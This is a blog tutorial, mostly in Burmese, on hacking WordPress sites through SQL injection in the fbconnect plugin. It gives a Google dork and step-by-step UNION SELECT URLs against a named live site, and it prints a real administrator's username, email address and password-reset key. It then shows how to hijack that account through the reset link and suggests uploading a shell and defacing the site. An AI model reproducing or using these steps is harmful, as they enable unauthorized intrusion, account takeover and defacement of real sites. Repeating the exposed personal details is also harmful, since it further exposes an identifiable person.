9/22/2013

How to Hack Wordpress Site

WP ကုိ ဟက္ခ်င္ပါတဲ့ဆုိတဲ့ညီအကုိမ်ားအတြက္ ဒီပုိ႔စ္ေလးကအေထာက္အကူျပဳမယ္ထင္ပါတယ္။ ဒီပုိ႔စ္ကနည္းအတုိင္းမလုပ္ခင္ SQL Injection အေၾကာင္းနည္းနည္းပါးပါးနားလည္ရင္ေတာ့ ေကာင္းမယ္ဗ်။ ဘာလုိ႔လဲဆုိေတာ့ ကြ်န္ေတာ္ကုိနည္းေျပာျပေနတဲ့အခ်ိန္မွာ မလုပ္ဖူးေတာ့ ေတာ္ေတာ္ေခါင္းစားလုိ႔ပါ။ အေျခမခုိင္ေတာ့ ဟီး ကဲဗ်ာ ဒီေန႔ေတာ့ ကြ်န္ေတာ္ ဆရာတစ္ေယာက္ေျပာျပတဲ့နည္းကုိ ျပန္ရွယ္ေပးလုိက္ပါတယ္။ wp ကုိဟက္ခ်င္တယ္ေျပာတဲ့ ညီအကုိမ်ားအတြက္ပါ။ (မ်ဳိးၾကီးေလသံျဖင့္ :D) ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ vul ျဖစ္ေနတဲ့ ဆုိဒ္ေတြကုိရွာရပါမယ္။ ဒီေတာ့ Google မွာေအာက္က Dork ေလးနဲ႔အရင္ရွာလုိက္ပါ။

Dork: inurl:"fbconnect_action=myhome"



ကဲ အဲဒီလင့္ေတြအမ်ားၾကီးထဲမွာ 10,7,6 ဆုိတာပါရင္ SQL Vul ျဖစ္ေနတဲ့ဆုိဒ္ျဖစ္ပါတယ္။ လင့္ေတြကုိဝင္ၾကည့္ျပီးရွာၾကည့္ေပါ့ေနာ္။ကြ်န္ေတာ္နမူနာျပထားတဲ့ဆုိဒ္ကုိ ေအာက္မွာေသခ်ာၾကည့္လုိက္ပါ။

sqli =>
site.com/fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--   In My case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

ဟုတ္ျပီဗ်ာ။ ဝုိင္းထားတဲ့ေနရာမွာ ကြ်န္ေတာ္တုိ႔ရွာေနတဲ့ vul နဲ႔ကုိက္ပါျပီ။ ဒါက SQL ေပါက္ေနတာပါ။

Stato:
Nome: 10
Membro da: 7
Website URL: 6


ကဲ ေနာက္တစ္ဆင့္ကေတာ့ table prefix ကုိစစ္မယ္ဗ်ာ။ အသုံးျပဳရမယ့္ဟာကေတာ့

sqli=>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--

ျဖစ္ပါတယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--  ဒီေနရာမွာ http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--   ဒီလုိေလးအစားထုိးေပးလုိက္တာေပါ့ေနာ္။ ဒါဆုိရင္ ေအာက္ကလုိေတြ႕ရပါမယ္။


ဒါဆုိရင္ အေပၚက ပုံမွာျပထားတဲ့အတုိင္း wp_ prefix ေတြကုိ ip2nation,ip2nationCountries,wp_Counterize,wp_Counterize_Keywords,wp_Counterize_Pages ဝုိင္းထားသလုိမ်ဳိးျမင္ေနရပါျပီ။ ဒီအဆင့္ထိေအာင္ျမင္ျပီဆုိ ေနာက္တစ္ဆင့္ကုိသြားမယ္ဗ်ာ။

sqli =>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email),8,9,10,11,12+from+wp_users--

ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးအစားထုိးျပီး ေခၚၾကည့္လုိက္မယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users--   ဒါကေတာ့ အဲဒီဆုိဒ္မွာရွိတဲ့ username, email address ကုိလွမ္းျပီးႏွိက္ၾကည့္တဲ့ SQL တစ္ခုေပါ့ေနာ္။ ဒါဆုိရင္ ဆုိဒ္မွာ သုံးထားတဲ့ username, email address ကုိေတြ႕ရပါျပီ။ ဒါကုိခဏမွတ္ထားေပးပါ။ ေနာက္တစ္ခါျပန္သုံးရမွာမုိ႔ပါ။


Stato:
Nome: 10
Membro da: 2:Rudy::r.checchin@gmail.com
Website URL: 6

ဒီေတာ့ Username က Rudy, email address က  r.checchin@gmail.com ဆုိျပီးသိရပါျပီ။ေနာက္တစ္ဆင့္သြားမယ္ဗ်ာ။ အဲဒီဆုိဒ္ရဲ႕ admin login panel ကုိသြားပါ။ ျပီးရင္ password ေမ့သြားပါတယ္ဆုိျပီး Request လုပ္လုိက္မယ္။ http://www.wildwind.it/wp-admin/


ဒါဆုိရင္ Password Forget တဲ့အတြက္ Recover ျပန္လုပ္ဖုိ႔ သူက သက္ဆုိင္ရာ email ဆီ activate လုပ္ဖုိ႔ျပင္ဆင္ပါလိမ့္မယ္။ ဒီေတာ့ ခုနက ကြ်န္ေတာ္တုိ႔ရထားတဲ့ email နဲေအာက္လုိျဖည့္ေပးျပီး Enter ေခါက္ေပးလုိက္ေပါ့ဗ်ာ။ ကဲ လာျပီ။ ေနာက္တစ္ခု။


ျပီးရင္ ေအာက္ကပုံအတုိင္းေတြ႕ရပါမယ္။ Box ႏွစ္ခုလုံးမွာ ဘာမွမေရးဘဲ ခဏခ်န္ထားလုိက္ပါ။



http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ျပီးရင္ ေစာေစာက မွတ္ထားတာေလး ျပန္ၾကည့္မယ္။ အဲဒီမွာ user name က Rudy, Activation key က hSTGEM9iWvnryRgJL6tz   ျဖစ္ပါတယ္။


ဒီေတာ့ username, activation key ကုိ ဒီေနရာေလးမွာ အစားထုိးေပးရမွာျဖစ္ပါတယ္။

http://www.wildwind.it/wp-login.php?action=rp&key=key&login=username

ဒါဆုိရင္ ေအာက္ကအတုိင္း ျဖစ္သြားမွာပါ။


www.wildwind.it/wp-login.php?action=rp&key=hSTGEM9iWvnryRgJL6tz&login=Rudy

အဲဒီမွာ ကုိယ္လုိခ်င္တဲ့ password ရုိက္ထည့္ေပးရုံပါပဲ။ ထုံးစံအတုိင္းႏွစ္ခါမွန္ေအာင္ရုိက္ေပးလုိက္ပါ။



ဒါဆုိရင္ ေအာက္ကလုိ Accept ျဖစ္သြားပါမယ္။


ကဲ ေနာက္ဆုံးအဆင့္ေရာက္ပါျပီ။ wp-admin ကုိျပန္သြားျပီး ခုနက ကြ်န္ေတာ္တုိ႔ေပးထားတဲ့ password အသစ္နဲ႔ login ဝင္ႏုိင္ပါျပီ။ username က Rudy ေနာ္။ http://www.wildwind.it/wp-admin


Bravo! I'm in :D


ကဲ ဒါဆုိရင္ေတာ့ shell တင္မယ္။ ေနာက္ Deface တင္လုိ႔ရပါျပီ။ shell တင္နည္းကုိေတာ့ ဒီ မွာျပန္ၾကည့္ႏုိင္ပါတယ္။  Deface တင္နည္းကုိလည္း ဒီ မွာၾကည့္ႏုိင္ပါတယ္။ အဆင္ေျပၾကပါေစ။


Special Thanks to: $0m30n3 (BMH)

1 comment:

  1. very rare tut bro, carry on bro .
    cheer (y).
    I'm hopping for next trip :(

    ReplyDelete

If you good, i don't bad. if you think you can bark me, I think i can also fuck you. I'm just ordinary person. Is that OK? :)